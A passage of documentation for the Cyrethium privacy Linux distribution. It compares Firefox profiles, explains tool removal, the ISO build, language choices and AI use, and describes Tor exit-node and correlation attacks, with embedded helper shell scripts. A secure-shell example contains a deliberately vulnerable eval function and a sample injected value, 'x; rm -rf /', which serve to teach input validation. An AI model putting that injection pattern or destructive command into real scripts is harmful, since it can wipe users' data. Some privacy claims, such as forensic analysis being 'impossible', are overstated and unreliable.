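browser.cache.disk.enable true
javascript.options.wasm true
EOF
    ;;
    amnesic) cat <<'EOF'
privacy.resistFingerprinting.letterboxing true
webgl.disabled true
media.peerconnection.ice.relay_only true
browser.cache.disk.enable false
places.history.enabled false
javascript.options.wasm false
browser.display.use_document_fonts 0
devtools.policy.disabled true
privacy.sanitize.sanitizeOnShutdown true
privacy.clearOnShutdown.cookies true
EOF
    ;;
    *) echo "unknown profile: $1" >&2; return 2 ;;
    esac
}

# Emit user_pref("name", value); lines for a profile, ready to save as user.js.
render_userjs() {
    { common_policy; profile_policy "$1"; } | while read -r name value; do
        printf 'user_pref("%s", %s);\n' "$name" "$value"
    done
}

# Value of one pref in a user.js/prefs.js file (last definition wins), or empty.
pref_value() {
    sed -n "s/^user_pref(\"$2\", *\(.*\));.*$/\1/p" "$1" | tail -n 1
}

# One line per deviation from the profile: "name expected=X actual=Y".
audit_userjs() {
    { common_policy; profile_policy "$2"; } | while read -r name expected; do
        actual=$(pref_value "$1" "$name")
        [ "$actual" = "$expected" ] && continue
        printf '%s expected=%s actual=%s\n' "$name" "$expected" "${actual:-<unset>}"
    done
}

# Succeeds only when the file matches the profile completely.
check_profile() {
    [ "$(audit_userjs "$1" "$2" | wc -l | tr -d ' ')" -eq 0 ]
}

# Usage: sh prefs-audit.sh <hardened|amnesic> <path/to/user.js>
if [ "$#" -eq 2 ]; then
    audit_userjs "$2" "$1"
    check_profile "$2" "$1" && echo "$2 matches the $1 profile"
fi
```

Firefox reads user.js from the profile directory at startup and applies it over prefs.js, so `render_userjs amnesic > ~/.mozilla/firefox/<profile>/user.js` is enough to apply a profile, and `sh prefs-audit.sh hardened prefs.js` shows which listed protections a running profile has drifted from. Settings the page lists but the script does not check (the 1GB disk cache size, the 512MB memory cache, the individual clearOnShutdown categories) can be appended to the policy lists in the same name/value form.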

Performance Impact

Amnesic is slower because:

  • No disk cache (downloads everything each visit)
  • Higher RAM usage (512MB memory cache)
  • Higher bandwidth consumption
  • Some sites won't work (WebGL, WASM disabled)

Recommended Strategy

Use both browsers for different purposes:

  • Hardened: Your daily driver for regular browsing
  • Amnesic: Special tool for sensitive operations

Hardened vs Vanilla Firefox

Security Score Comparison

  • Vanilla Firefox: 6.5/10 (Standard Mozilla configuration)
  • Hardened Firefox: 9.2/10 (+2.7 points improvement)

Major Security Improvements in Hardened

Telemetry (Vanilla: 3/10 → Hardened: 10/10)

Vanilla: Sends data to Mozilla (telemetry, health reports, studies)

Hardened: All telemetry completely disabled, zero data sent

Fingerprinting (Vanilla: 4/10 → Hardened: 9/10)

Vanilla: Real browser fingerprint exposed

Hardened: Resist Fingerprinting enabled, standardized characteristics

WebRTC (Vanilla: 3/10 → Hardened: 8/10)

Vanilla: Local and public IP can leak

Hardened: IP hidden with no_host and default_address_only

HTTPS (Vanilla: 7/10 → Hardened: 10/10)

Vanilla: HTTP sites allowed by default

Hardened: HTTPS-Only Mode enforced, TLS 1.2+ required

Tracking (Vanilla: 7/10 → Hardened: 10/10)

Vanilla: Standard tracking protection

Hardened: Strict mode with Total Cookie Protection

Disabled in Hardened (Privacy Concerns)

  • Pocket integration
  • Firefox Sync
  • Password manager
  • Safe Browsing (sends URLs to Google)
  • DNS over HTTPS (use system DNS)
  • All prefetching and speculative connections

When to Use Vanilla vs Hardened

Use Vanilla if: You want maximum compatibility and don't care about privacy/security

Use Hardened if: You want strong privacy and security while maintaining usability

Amnesic Firefox vs Tor Browser

Both browsers are designed for maximum privacy and security. Here's how they compare:

Quick Comparison

Feature        | Amnesic                     | Tor Browser
Security Score | 9.8/10                      | 10/10
Anonymity      | 8/10 (requires Cyrethonion) | 10/10 (built-in Tor)
Privacy        | 10/10                       | 10/10
Performance    | 6/10                        | 4/10

Similarities (90% overlap)

Both browsers share most privacy features:

  • Resist Fingerprinting (RFP) enabled
  • Letterboxing enabled
  • WebGL disabled
  • WebAssembly disabled
  • Document fonts disabled
  • HTTPS-Only Mode
  • WebRTC relay_only enabled
  • No telemetry
  • Maximum tracking protection

Critical Differences

1. Network Routing (Most Important)

Tor Browser: Built-in Tor network (3-hop routing), automatic anonymity

Amnesic: Requires manual Tor/VPN configuration (use Cyrethium's Cyrethonion tool)

2. JavaScript JIT

Tor Browser: JIT disabled (maximum security, but 10-20x slower JavaScript)

Amnesic: JIT enabled (better performance, slightly less secure)

3. Disk Cache

Tor Browser: Disk cache enabled (cleared on shutdown)

Amnesic: Disk cache disabled (RAM-only, no forensic traces)

4. DevTools

Tor Browser: DevTools available

Amnesic: DevTools disabled (reduced attack surface)

5. Session Restore

Tor Browser: Crash recovery enabled

Amnesic: No session data stored

Performance Comparison

Scenario         | Amnesic | Tor Browser
First visit      | 1.1s    | 3.0s
JavaScript-heavy | 3.0s    | 10.0s

When to Use Each

Use Tor Browser When:

  • Maximum anonymity required
  • Activism or whistleblowing
  • Under censorship (built-in bridges)
  • Accessing .onion sites
  • Not using Cyrethium

Use Amnesic Firefox When:

  • Using public computers (no disk traces)
  • Using Cyrethium (with Cyrethonion)
  • Need better performance than Tor
  • Maximum privacy but not necessarily anonymity
  • Forensic analysis protection is priority

Recommendation

For Cyrethium users: Use Amnesic Firefox with Cyrethonion for Tor routing

For non-Cyrethium users: Use Tor Browser for built-in anonymity

For public computers: Amnesic Firefox (no disk cache)

Amnesic vs Vanilla Firefox

Security Score Comparison

  • Vanilla Firefox: 6.5/10
  • Amnesic Firefox: 9.8/10 (+3.3 points improvement)

Critical Differences

Data Persistence

Vanilla: Everything saved (history, cookies, cache, logins)

Amnesic: Everything deleted on close, zero traces left

Forensic Analysis

Vanilla: Forensic analysis possible (data on disk)

Amnesic: Forensic analysis impossible (no disk cache, RAM-only)

Fingerprinting

Vanilla: Real fingerprint exposed (WebGL, fonts, screen resolution)

Amnesic: Maximum protection (WebGL disabled, letterboxing, no fonts)

Telemetry

Vanilla: Sends data to Mozilla

Amnesic: Zero telemetry

Performance Comparison

Metric             | Vanilla       | Amnesic
First visit        | 1.0s          | 1.1s
Second visit       | 0.3s (cached) | 1.1s (no cache)
Site compatibility | 100%          | ~70%

Use Case Decision

Use Vanilla for: Daily browsing with maximum compatibility (if you don't care about privacy)

Use Amnesic for: Public computers, sensitive operations, maximum privacy scenarios

Recommendation: Never use Vanilla. Use Hardened for daily browsing and Amnesic for sensitive tasks.

How to Remove a Tool

Cyrethium's tools come pre-integrated into the system. They are not distributed as .deb packages — instead, they are executed directly from source code.

This design ensures transparency and eliminates any suspicion of tampering. Because of this, tools cannot be removed using apt remove.

It is not recommended to remove built-in tools, as many of them are interconnected or dependent on each other. If you delete one, you won't be able to restore it, since Cyrethium does not use any official repositories.

Still, the choice is yours — just make sure you know exactly what you're doing.

Tool Locations

Tools are typically located in the following directories:

/usr/bin
/usr/local/bin
/opt/       # In the full Cyrethium edition, this directory only contains Anti-Exploit Suite modules.

To remove a specific tool, navigate to its location and delete it manually.

Additionally, remove its desktop shortcut (if present) from:

/usr/share/applications/toolname.desktop
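Because the page warns that tools depend on one another and cannot be reinstalled from a repository, it is worth checking what else references a tool before deleting it by hand. The script below is an added example and not a Cyrethium tool: it lists the files in the directories named above that belong to a tool, and greps the same directories for other scripts that call it. It only reports; it never deletes anything. The directory list is the one from this page; TOOL_DIRS and DESKTOP_DIR can be overridden to inspect elsewhere.

```shell
#!/bin/sh
# Added example (not a Cyrethium tool): list a built-in tool's files and the
# other tools that reference it, so the "interconnected" warning above can be
# checked before anything is deleted. Nothing here removes a file. The
# directories are the ones listed above; override TOOL_DIRS and DESKTOP_DIR
# to inspect another location.

TOOL_DIRS=${TOOL_DIRS:-"/usr/bin /usr/local/bin /opt"}
DESKTOP_DIR=${DESKTOP_DIR:-/usr/share/applications}

# Candidate files for the tool: its executable in each tool directory plus
# its desktop shortcut, one path per line.
tool_files() {
    name=$1
    for d in $TOOL_DIRS; do
        [ -e "$d/$name" ] && echo "$d/$name"
    done
    [ -e "$DESKTOP_DIR/$name.desktop" ] && echo "$DESKTOP_DIR/$name.desktop"
    return 0
}

# Other files under the tool directories that mention the tool as a whole
# word, excluding the tool itself. A non-empty list means removing the tool
# will break those scripts.
dependents_of() {
    name=$1
    for d in $TOOL_DIRS; do
        [ -d "$d" ] || continue
        grep -rlsw -- "$name" "$d" | grep -v "/$name\$" || true
    done
}

# Summary for a human; returns 1 when dependents exist so a wrapper can stop.
removal_report() {
    name=$1
    echo "Files belonging to $name:"
    tool_files "$name" | sed 's/^/  /'
    deps=$(dependents_of "$name")
    if [ -n "$deps" ]; then
        echo "Tools referencing $name (would break if it is removed):"
        printf '%s\n' "$deps" | sed 's/^/  /'
        return 1
    fi
    echo "No other tool references $name."
}

# Usage: sh tool-report.sh <toolname>
if [ "$#" -eq 1 ]; then
    removal_report "$1"
fi
```

Run `sh tool-report.sh toolname` and delete the listed files only if the report ends with "No other tool references"; a whole-word grep will miss references built from variables, so treat an empty list as a strong hint rather than proof.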

Tool Submission

If you have developed a tool focused on privacy, security, or threat analysis, you can include your project in the review process. Every tool submitted to the community is evaluated for compliance with system policies and security standards.

Submission Rules:

  • The tool must be completely open-source.
  • The codebase must be secure, reviewable, and suitable for independent verification.
  • The tool's operating principles must not share data with third-party services.
  • Tools deemed appropriate after security review are added to the system.

Eligibility Areas:

The tool must focus on at least one of the following categories:

  • Privacy
  • Security
  • Threat Analysis
  • Cryptocurrency Security
  • Attack Detection / Prevention

Preferred Programming Languages

The language used when developing a tool is critically important in terms of security, performance, and system compatibility. Some languages commonly used in Linux-based systems are preferred because they provide both easy integration and a high level of security.

Python:

It is one of the most preferred languages for cybersecurity tools. Thanks to its modular structure, rich library ecosystem, and easily readable syntax, it offers rapid development opportunities. It is very effective in areas such as network traffic analysis, log examination, and system interaction. It is the most used language in Cyrethium tools.

Shell (Bash):

It is a reliable and fast scripting language found natively on Linux systems. It is preferred for system management, automation, log cleaning, network configuration, and maintenance operations. Since it provides direct access to system commands and utilities, it offers a high degree of control in security tests and system operations.

Perl:

It is powerful in text processing and regular expressions (regex). It offers high performance in situations where network logs, analysis data, or system records need to be processed. Thanks to its powerful script infrastructure, it can work compatibly with old systems.

Lua:

It is a lightweight and embeddable scripting language. It uses few resources in the system, making it ideal for plugin-based or modular security tools. Thanks to its simple syntax, it supports rapid script development.

Go (Partial):

Go is suitable for developing high-performance and concurrent applications. It is especially preferred in tools with high network connectivity and processing intensity. Although its statically compiled structure provides a security advantage, it should be used carefully in terms of file size and dependencies.

Security and Ethical Principles

Every tool submitted is independently reviewed and evaluated according to the following principles:

  • Every tool must protect user privacy.
  • It cannot contain background connections, telemetry, or data collection operations.
  • Malicious or exploitable code, or code that can be used for unethical purposes, is strictly rejected.
  • The goal is to create an ecosystem that protects users' privacy, security, and digital freedom.

Building Cyrethium ISO

Cyrethium ISOs are created using Live-Build, Debian's official image creation tool. Live-Build is a powerful and flexible tool designed to produce customized live operating system images on Debian-based systems.

What is Live-Build?

Live-Build allows developers to compile their own Debian-based distributions in a modular way. That is, when creating an ISO, all details such as which packages will be installed, which services will be active, and which configuration files will be included can be defined. This way, the created ISO becomes completely controllable and reproducible.

Why is Live-Build Used?

Official Debian standard:

It is a tool developed and supported by Debian, which provides a great advantage in terms of stability and security.

Transparent structure:

How the image is produced is completely defined by scripts. This facilitates version management, debugging, and external contributions.

Reproducibility:

When the same configuration files are used, every developer can produce the same ISO. This is important for security because the result becomes deterministic.

Flexibility:

Components such as kernel, desktop environment, package sources, or system settings can be easily changed. This way, custom configured versions, test images, or lightweight versions can be prepared.

General Build Logic

The Live-Build process consists of several basic stages:

Configuration:

The system's architecture, desktop environment, packages to be included, and other parameters are determined with the lb config command.

Build (Compilation):

The live system image is created according to the configuration by running the lb build command. At this stage, the tool downloads the necessary Debian packages, creates the file system, and produces the ISO file.

Customization:

Developers can add additional files, scripts, or configurations using directories like config/includes.chroot/. This method allows the distribution's unique identity to be included in the ISO.
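The three stages above fit in one small script. The one below is an added example and not Cyrethium's actual build script: it wraps `lb config`, the `config/` customization (a package list, an included file, a chroot hook) and `lb build` in shell functions. The lb options and the `config/` paths are live-build's own; the distribution, package names, hostname and the sysctl line are illustrative assumptions.

```shell
#!/bin/sh
# Added example, not Cyrethium's real build script: the stages described
# above (lb config, customization under config/, lb build) as shell
# functions. The distribution, package names, hostname and sysctl line are
# illustrative assumptions; the lb options and config/ paths are live-build's own.
set -e

DIST=${DIST:-bookworm}

# Stage 1: lb config creates config/ and records distribution, architecture,
# archive areas, image type and the kernel command line of the live system.
configure() {
    lb config \
        --distribution "$DIST" \
        --architectures amd64 \
        --archive-areas "main contrib non-free-firmware" \
        --binary-images iso-hybrid \
        --debian-installer none \
        --bootappend-live "boot=live components hostname=cyrethium-live"
}

# Customization: everything under config/ is picked up by lb build.
#   package-lists/*.list.chroot   packages installed into the live system
#   includes.chroot/              files copied verbatim into the live filesystem
#   hooks/live/*.hook.chroot      scripts run inside the chroot during the build
customize() {
    mkdir -p config/package-lists config/includes.chroot/etc/sysctl.d config/hooks/live

    # Privacy tools the page names, as Debian package names (one per line).
    printf '%s\n' tor i2pd dnscrypt-proxy firefox-esr \
        > config/package-lists/privacy.list.chroot

    # An included file: ends up at /etc/sysctl.d/90-example.conf in the image.
    printf 'net.ipv4.ip_forward = 0\n' \
        > config/includes.chroot/etc/sysctl.d/90-example.conf

    # A chroot hook: runs inside the image during the build; this one drops
    # the apt package cache so downloaded .deb files do not end up in the ISO.
    cat > config/hooks/live/0100-clean-apt.hook.chroot <<'EOF'
#!/bin/sh
set -e
apt-get clean
EOF
    chmod +x config/hooks/live/0100-clean-apt.hook.chroot
}

# Stage 2: lb build fetches packages, assembles the chroot and writes
# live-image-amd64.hybrid.iso into the working directory (run as root).
build() {
    lb build
}

# Usage (in an empty working directory): sh build-iso.sh config|build|all
case ${1:-} in
    config) configure; customize ;;
    build)  build ;;
    all)    configure; customize; build ;;
esac
```

Keeping `config/` under version control is what makes the reproducibility point above concrete: two developers with the same `config/` tree and the same package mirror snapshot get the same image, and a diff of `config/` is a diff of the distribution.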

More Information

For comprehensive technical documentation and examples about Live-Build, you can review Debian's official Live-Build guide:

https://live-team.pages.debian.net/live-manual/html/live-manual/index.en.html

Python

Python is the most used programming language in the Cyrethium ecosystem. The reason for this is not just its popularity, but the balance it offers in terms of security, readability, and system integration. It has a wide range of uses in the cybersecurity field, both on the analysis and automation sides.

Why Python?

Readability and ease of maintenance

Python's syntax is simple and the logic of the code can be easily followed. This is a critical feature in security tools because complex and hidden behaviors can be easily noticed. The code being open allows it to be quickly audited by third-party developers.

Wide library ecosystem

Python contains many powerful modules such as socket, asyncio, requests, scapy, psutil, cryptography. This way, functions such as network traffic analysis, process monitoring, encryption, exploit detection, or log examination can be done without needing additional code.

Rapid prototyping

Security tools generally require rapid testing and validation cycles. Python's dynamic structure makes it possible to prototype and test a complex tool in a short time. This provides a great advantage in terms of time in security-focused development.

Cross-platform compatibility

Python code can often run on Linux, Windows, and macOS without any changes. This situation allows developers to test their tools without being limited to just one environment.

Python's Advantages in Linux Environment

Built-in support:

Most Linux distributions come with Python. It does not require extra installation or dependencies. This facilitates system integration and post-distribution operation.

Access to system APIs:

Python can interact directly at the system level on Linux with modules like os, subprocess, fcntl, signal. This way, many operations from network configurations to process management can be automated securely.

Community support:

Linux and Python communities have been intertwined for years. There are plenty of resources and active developer support on security, performance, and debugging.

Python's Security

Python is considered secure at the language level, but "how it is used" is determinative in terms of security. It is not harmful itself; however, there are some points to be careful about:

Pros:

  • Since memory management is automatic, classic vulnerabilities like buffer overflow do not occur.
  • Since code readability is high, it is difficult to add or hide backdoors.
  • Thanks to the large security community, vulnerabilities are generally detected quickly.

Cons:

  • It is slower than compiled languages, so it is not preferred in performance-critical applications.
  • Third-party libraries should be chosen carefully; a malicious or unmaintained module can create a security risk.

Conclusion

Python is the primary language preferred by developers in Cyrethium because it strikes a balance between security and accessibility. It provides both powerful integration at the system level and allows for the development of fast, readable, and reliable tools. When used correctly, Python is a strong, easy-to-maintain, and reliable foundation in terms of security.

Shell (Bash) Scripting

Shell is the natural language of Linux systems. For many system administrators, security experts, and developers, Shell is the simplest way to speak directly with the system. In Linux-based projects like Cyrethium, Shell scripts are indispensable in terms of automation, system control, and privacy operations.

Why Shell?

Direct interaction with the system

Shell is the language closest to the kernel and basic Linux tools. It provides direct access to system resources, network configurations, and process management with commands like iptables, systemctl, grep, awk, sed, ps. This way, powerful operations can be performed without needing external libraries.

Lightweight and fast

It does not require compilation, dependencies, or large runtime environments. It is already present on every modern Linux system. This makes scripts both portable and minimal.

Ease of automation and system management

Tasks such as log cleaning, network configuration, service startup, or system maintenance can be done securely with a few lines of Bash script. Shell is suitable for the philosophy of "doing the job quickly, quietly, and effectively."

Ideal for privacy and security-focused operations

Shell is the most reliable method for sensitive tasks such as disk cleaning, log deletion, temporary file destruction, or system settings reset, because the layer it operates on is the operating system's own control level.

Its Power in Linux Environment

Comes built-in:

All Debian-based systems include Shell interpreters like Bash or Dash by default. This way, scripts work the same in every environment.

Integration with tool chain:

Everything is a file in Linux; this gives Shell great flexibility. When scripts are used together with tools like grep, cut, tr, awk, sed, they can quickly accomplish even complex data processing tasks.

Ease of maintenance and debugging:

Shell scripts are plain text, so they are easy to read, edit, and test. Debugging can be done with commands like set -x or trap.

Shell's Security

Shell is a quite reliable language when run in a secure environment, but there are some points to be careful about:

Pros:

  • Since the source code is open, hidden behaviors are easy to notice.
  • Since it has few external dependencies, the attack surface is low.
  • It provides high access control; it can be easily restricted through file permissions and user levels.

Cons:

  • If user inputs are processed directly, command injection risk may arise.
  • Error management can become difficult in large or complex projects.
  • Incorrect use of variables can lead to unexpected results on the system (especially with commands like rm, eval, sudo).
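The three cons above (command injection from raw input, weak error handling, and a misused variable reaching rm) each have a standard safe form. The script below is an added example, not a Cyrethium tool, showing them side by side for a small log-cleanup task; LOG_DIR is an assumed location and the deliberately vulnerable function is kept only for contrast and is never called.

```shell
#!/bin/sh
# Added example (not a Cyrethium tool): the three pitfalls listed above,
# each next to its safe form. LOG_DIR is an assumed location.

LOG_DIR=${LOG_DIR:-/var/log/mytool}

# Pitfall 1 (command injection): accept only plain file names. Letters,
# digits, dot, underscore and dash; no leading dot, so "..", ".hidden" and
# anything containing "/" or ";" is rejected before it reaches a command.
is_safe_name() {
    case $1 in
        ''|.*|*/*) return 1 ;;
        *[!A-Za-z0-9._-]*) return 1 ;;
    esac
    return 0
}

# VULNERABLE, kept only for contrast and never called: the name is spliced
# into a command string, so a name like "x; rm -rf /" runs two commands.
remove_log_unsafe() {
    eval "rm -f $LOG_DIR/$1"
}

# Safe form: validate, then pass the name as one quoted argument. "--" stops
# a name such as "-rf" from being parsed as an option.
remove_log() {
    is_safe_name "$1" || { echo "refused: invalid log name '$1'" >&2; return 1; }
    rm -f -- "${LOG_DIR:?}/$1"
}

# Pitfall 3 (unset variable): rm -rf "$dir/"* with an empty $dir expands to
# /*. ${dir:?} aborts with an error instead of expanding to nothing, and
# find limits the deletion to regular files directly inside the directory.
clear_dir() {
    dir=$1
    [ -d "${dir:?clear_dir: directory not given}" ] || return 1
    find "$dir" -mindepth 1 -maxdepth 1 -type f -exec rm -f -- {} +
}

# Pitfall 2 (error handling): fail fast and report where it stopped instead
# of continuing with a half-done cleanup.
# Usage: sh safe-cleanup.sh <logname>
if [ "$#" -eq 1 ]; then
    set -eu
    trap 'echo "cleanup failed at line $LINENO" >&2' EXIT
    remove_log "$1"
    trap - EXIT
fi
```

The pattern generalizes: validate untrusted input against an allow-list (never a deny-list of "bad characters"), quote every expansion, use `--` before file arguments, and make `set -eu` plus `${var:?}` turn a missing value into a loud failure rather than a wider rm.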

Conclusion

Shell is the backbone of Linux. As the cornerstone of security, system control, and automation, it stands out with both its simplicity and power. Its ability to communicate directly with the system makes it one of the most reliable tools in privacy-focused systems. When written correctly, Shell scripts are fast, portable, auditable, and secure.

AI in Cyrethium

In the Cyrethium project, artificial intelligence (AI) is used as an auxiliary analysis tool in specific areas. The goal is not to replace the developer; it is to speed up development processes, increase code quality, and detect possible errors earlier. Artificial intelligence is never an independent decision-maker in Cyrethium — it always works as a supervised, limited-authority auxiliary module.

Areas Where Artificial Intelligence is Used

Code Analysis

Artificial intelligence detects erroneous structure, unnecessary complexity, or possible risky operations by scanning the source codes of developed tools. It examines the readability and structural consistency of the code. In this process, static analysis methods are combined with AI-based patterns.

Code Evaluation

AI evaluates the general design of the code; it offers suggestions in terms of functional consistency, logic errors, unnecessary repetitions, and modular structure. This evaluation is done automatically, but every suggestion is reviewed by the developer.

Performance Analysis

The code is analyzed through metrics such as efficiency, processing time, and resource usage. Artificial intelligence can detect sections that may create bottlenecks especially in Python and Shell scripts and suggest alternative solutions. This saves development time and facilitates optimization.

Security Analysis (Security Review)

AI can flag dangerous function calls, weak encryption methods, incorrect permission management, or lines that carry injection risk in the code. This system combines the classic "static code analyzer" logic with a suggestion system to help the developer.

Website and Simple Shell Scripts

Artificial intelligence is also used in organizing website content, correcting language errors, and writing simple Shell scripts. Since these types of operations are low-risk and predictable in structure, they can be carried out quite quickly and safely with AI assistance.

Areas Where Artificial Intelligence is Not Used

Artificial intelligence is only activated in certain, safe areas in Cyrethium. It is consciously not used in the following areas because these processes require high precision and deterministic behavior:

  • Complex tool development processes
  • Tor routing infrastructure and anonymity mechanisms
  • System hardening operations
  • ISO or system build process (build pipeline)

Using artificial intelligence in these areas is risky; even a small error can damage system integrity or compromise security. Therefore, all critical building blocks are created entirely manually, with human oversight.

A Realistic Assessment

Artificial intelligence is still inadequate in complex software architectures or low-level network operations. It has no decision-making mechanism of its own; it can make incorrect inferences in incorrect or incomplete contexts. Therefore, entrusting complex security tools, anonymity infrastructure, or system kernel configurations to AI would be technically irresponsible.

On the other hand, it saves serious time in simple scripts, debugging, and code optimization. Especially in areas such as reviewing repetitive tasks or small code pieces, artificial intelligence reduces the developer's workload. This way, human energy can be directed to more creative, strategic, and security-critical tasks.

Conclusion

Artificial intelligence is not an "automatic decision-maker" in Cyrethium, it is an "assistant." It does not replace humans; it helps humans direct their attention to more important issues. It can fail in complex systems, but when used in the right place, it increases productivity and raises the quality of development. The basic principle of security applies here too: control is always with humans.

Exit Node Attacks

When you use Tor or similar anonymity networks, your internet traffic passes through multiple relay nodes before reaching its destination. The last node in this chain is called the "exit node" — it's the point where your traffic leaves the Tor network and enters the regular internet.

What is an Exit Node Attack?

An exit node attack occurs when a malicious actor operates an exit node to intercept, monitor, or modify your traffic. Since the exit node can see the final destination and content of unencrypted traffic, it poses a significant privacy risk.

How Exit Node Attacks Work

When your data reaches the exit node, it's decrypted from Tor's encryption layers. If you're visiting an HTTP (not HTTPS) website, the exit node operator can:

  • Read your traffic: See what websites you visit, what you search for, and what data you send.
  • Steal credentials: Capture usernames, passwords, and session cookies if they're sent over unencrypted connections.
  • Modify content: Inject malicious code, change website content, or redirect you to phishing sites.
  • Track patterns: Analyze your browsing habits and timing patterns.

Real-World Risks

Studies have shown that a small percentage of Tor exit nodes are operated by malicious actors who actively sniff traffic. Some exit nodes have been caught:

  • Harvesting login credentials from HTTP sites
  • Injecting cryptocurrency mining scripts into web pages
  • Redirecting users to fake banking sites
  • Collecting email addresses and personal information

How to Protect Yourself

1. Always Use HTTPS

HTTPS encrypts your connection end-to-end, meaning even if the exit node is malicious, it cannot read or modify your traffic. Always check for the padlock icon in your browser.

2. Use HTTPS Everywhere

Browser extensions like HTTPS Everywhere automatically upgrade HTTP connections to HTTPS when possible, reducing exposure to exit node attacks. Note that the EFF has since retired HTTPS Everywhere in favor of the HTTPS-Only Mode built into Firefox itself (the mode Cyrethium's browser configurations enable), so prefer the built-in mode where it is available.

3. Avoid Sensitive Activities on Tor

Don't log into important accounts (banking, email, social media) over Tor unless absolutely necessary. If you must, ensure the site uses HTTPS.

4. Use End-to-End Encryption

For messaging and file transfers, use tools with end-to-end encryption like Signal, PGP, or encrypted file sharing services.

5. Verify Certificates

Be alert for certificate warnings. A malicious exit node might attempt a man-in-the-middle attack by presenting fake certificates.

Cyrethium's Protection

Cyrethium includes hardened Firefox variants that:

  • Enforce HTTPS connections whenever possible
  • Warn about insecure connections
  • Block mixed content (HTTP content on HTTPS pages)
  • Provide strong certificate validation

Advanced Protection Techniques

Use Onion Services When Possible

Onion services (websites ending in .onion) provide end-to-end encryption within the Tor network. When you access an onion service, your traffic never leaves the Tor network, eliminating exit node risks entirely.

Implement Multi-Layer Encryption

For sensitive communications, use multiple layers of encryption:

  • PGP/GPG for email encryption
  • OTR or Signal Protocol for instant messaging
  • VeraCrypt for file encryption before transfer

Monitor Your Connections

Use tools to verify your connections are secure:

  • Check SSL/TLS certificate details
  • Use browser extensions that show connection security
  • Monitor for unexpected certificate changes
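"Monitor for unexpected certificate changes" can be made routine with a trust-on-first-use check: record the SHA-256 fingerprint of the certificate a site presents, and compare every later visit against it. The script below is an added example, not part of Cyrethium: `openssl s_client` and `openssl x509` are the real commands, while PIN_DIR, the script name and the host and fingerprint values used in testing are assumptions.

```shell
#!/bin/sh
# Added example (not a Cyrethium tool): a trust-on-first-use check for the
# "monitor for unexpected certificate changes" advice above. The first time a
# host is seen, its leaf-certificate SHA-256 fingerprint is pinned; later
# observations are compared against the pin. PIN_DIR is an assumption;
# openssl s_client / openssl x509 are the real commands.

PIN_DIR=${PIN_DIR:-$HOME/.cert-pins}

# Fingerprint of the certificate the server presents right now (needs
# network). Over Tor the exit relay sits on this path, so a certificate
# substituted there would show up as a different fingerprint.
fetch_fingerprint() {
    host=$1; port=${2:-443}
    openssl s_client -connect "$host:$port" -servername "$host" </dev/null 2>/dev/null \
        | openssl x509 -noout -fingerprint -sha256 \
        | sed 's/^.*Fingerprint=//'
}

# Reject host names that could escape PIN_DIR when used as a file name.
valid_host() {
    case $1 in
        ''|.*|*/*|*[!A-Za-z0-9.-]*) return 1 ;;
    esac
    return 0
}

# Compare an observed fingerprint with the stored pin. Prints NEW (pinned on
# first sight), OK, or CHANGED; returns 1 on CHANGED and 2 on a bad host name.
check_pin() {
    host=$1; observed=$2
    valid_host "$host" || { echo "bad host name: $host" >&2; return 2; }
    mkdir -p "$PIN_DIR"
    pinfile=$PIN_DIR/$host
    if [ ! -f "$pinfile" ]; then
        printf '%s\n' "$observed" > "$pinfile"
        echo "NEW $host $observed"
        return 0
    fi
    pinned=$(cat "$pinfile")
    if [ "$pinned" = "$observed" ]; then
        echo "OK $host"
        return 0
    fi
    echo "CHANGED $host pinned=$pinned observed=$observed"
    return 1
}

# Usage: sh cert-pin.sh <host> [port]
if [ "$#" -ge 1 ]; then
    check_pin "$1" "$(fetch_fingerprint "$1" "${2:-443}")"
fi
```

A CHANGED result is a prompt to look, not proof of an attack: sites rotate certificates legitimately, so compare the new fingerprint against what the site shows over a different network path before deciding. The first pin is only as trustworthy as the connection it was taken over, which is why the check pairs with, rather than replaces, the browser's own chain validation.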

Real-World Exit Node Attack Examples

2007: Egerstad's Experiment

Security researcher Dan Egerstad operated several Tor exit nodes and captured thousands of email credentials from embassies and government organizations. This demonstrated that exit nodes could be used for mass surveillance of unencrypted traffic.

2020: Cryptocurrency Theft

Malicious exit nodes were caught modifying Bitcoin and cryptocurrency addresses in HTTP traffic, redirecting payments to attackers' wallets. This resulted in significant financial losses for users who didn't verify addresses.

SSL Stripping Attacks

Some exit nodes have attempted to downgrade HTTPS connections to HTTP, making traffic readable. Modern browsers now have protections against this, but it remains a concern.

How to Verify Exit Node Safety

Check Exit Node Reputation

Some organizations maintain lists of known malicious exit nodes. While Tor automatically avoids flagged nodes, staying informed helps you understand the threat landscape.

Use Tor Browser's Security Slider

Tor Browser includes a security slider that can be set to "Safest" mode, which:

  • Disables JavaScript on all sites
  • Blocks some fonts and symbols
  • Disables video and audio playback
  • Makes sites display only static content

Regularly Change Circuits

Don't use the same exit node for extended periods. Tor Browser allows you to request a new circuit (New Identity), which changes your exit node and makes long-term monitoring harder.

The Bottom Line

Exit node attacks are a real threat, but they're largely preventable. The key is to always use encrypted connections (HTTPS) and avoid sending sensitive information over unencrypted channels. Tor provides anonymity by hiding your identity and location, but it doesn't automatically encrypt your traffic to the final destination — that's your responsibility.

Remember: Tor is designed to protect your anonymity (who you are), not the content of your communications. Content protection is achieved through encryption (HTTPS, PGP, etc.). Use both together for complete protection.

Correlation Attacks

Correlation attacks are one of the most sophisticated threats to anonymity networks like Tor. Unlike exit node attacks that focus on the content of your traffic, correlation attacks aim to identify who you are by analyzing patterns in network traffic.

What is a Correlation Attack?

A correlation attack works by observing traffic entering and leaving the Tor network, then using statistical analysis to match patterns. If an attacker can monitor both where traffic enters the network (entry node) and where it exits (exit node), they can potentially link the two and identify the user.

How Correlation Attacks Work

The basic principle is simple but powerful:

1. Traffic Observation

An attacker monitors network traffic at multiple points — ideally at both the entry and exit of the Tor network. This could be done by:

  • Operating multiple Tor nodes (entry, middle, and exit)
  • Compromising internet service providers (ISPs)
  • Monitoring internet exchange points
  • Controlling network infrastructure in certain regions

2. Pattern Analysis

The attacker analyzes characteristics of the traffic, such as:

  • Timing: When packets are sent and received
  • Volume: How much data is transferred
  • Packet sizes: The size of individual data packets
  • Traffic bursts: Patterns of activity and idle periods

3. Correlation

By comparing these patterns, the attacker tries to match traffic entering the network with traffic exiting it. If the patterns are similar enough, they can conclude that both streams belong to the same user.

Types of Correlation Attacks

Timing Correlation

This is the most common type. When you send a message through Tor, it takes a certain amount of time to travel through the network. By measuring when traffic enters and exits, an attacker can identify connections with matching timing patterns.

Volume Correlation

If you download a large file or stream video, the amount of data transferred creates a unique pattern. An attacker monitoring both ends can match these volume patterns to identify you.

Website Fingerprinting

Even with encryption, different websites have unique traffic patterns (page sizes, number of resources, loading sequences). An attacker can create "fingerprints" of websites and match them to your traffic.

Who Can Perform Correlation Attacks?

